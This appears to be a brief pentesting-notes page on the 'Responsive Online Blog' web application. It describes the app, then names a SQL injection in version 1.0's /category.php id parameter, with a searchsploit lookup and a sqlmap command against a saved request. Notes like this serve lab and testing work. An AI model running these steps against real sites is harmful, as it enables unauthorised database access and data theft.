Responsive Online Blog

101

Responsive Online Blog is a basic content management system (CMS)-style web application that allows users to read and interact with blog posts. It's typically used for learning or small-scale blogging purposes and includes common CMS features like post management, user interaction, and dynamic content loading.

Attacks

Version 1.0 is vulnerable to a SQLi in /category.php?id=1:

$ searchsploit Responsive Blog
Responsive Online Blog 1.0 - 'id' SQL Injection | php/webapps/48615.txt

$ sqlmap -r blog_category.req --batch

Last updated

Was this helpful?